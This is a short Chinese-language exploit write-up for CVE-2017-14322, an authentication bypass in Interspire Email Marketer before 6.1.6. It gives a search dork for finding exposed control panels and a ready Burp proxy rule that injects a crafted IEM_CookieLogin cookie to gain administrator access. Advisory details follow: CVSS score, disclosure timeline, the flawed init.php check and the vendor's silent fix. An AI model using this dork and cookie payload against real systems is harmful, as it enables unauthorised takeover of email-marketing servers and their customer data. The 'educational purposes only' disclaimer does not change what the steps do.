intitle:"Control Panel" + emailmarketer
为请求头添加一个 Match 和 Replace 规则,如下所示:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
打开站点时,由于不存在 Cookie 头,第一次不会生效。使用添加了上述规则的 Burp 代理第二次刷新站点,你就会看到想要的结果。确保勾选 “Intercept Client Requests”。
Interspire Email Marketer - 远程管理员身份验证绕过
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
CVSS 基础评分: 9.8 CVSS 向量: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 发现漏洞 2017-09-12 发现供应商已修复该漏洞,但从未告知客户,导致野外仍有数百个系统易受攻击 2017-10-17 公开披露
Interspire Email Marketer 6.1.6 之前的版本
http://www.interspire.com/emailmarketer/
负责检查用户是否已登录的函数位于 Interspire Email Marketer (IEM) 6.1.6 之前的版本中的 init.php, 该函数允许远程攻击者通过使用特制的 IEM_CookieLogin cookie 值绕过身份验证并 获得管理访问权限。 此外,如果客户没有年度维护计划, 应用程序会声称它运行在最新的可用版本上,并且没有更新。
这些漏洞是在对应用程序的一个受入侵实例 进行事件响应时发现的。
供应商已在 6.1.6 版本中修复了该漏洞,但从未专门向其客户告知。
此漏洞利用工具仅用于教育目的,不对你自己的行为负责。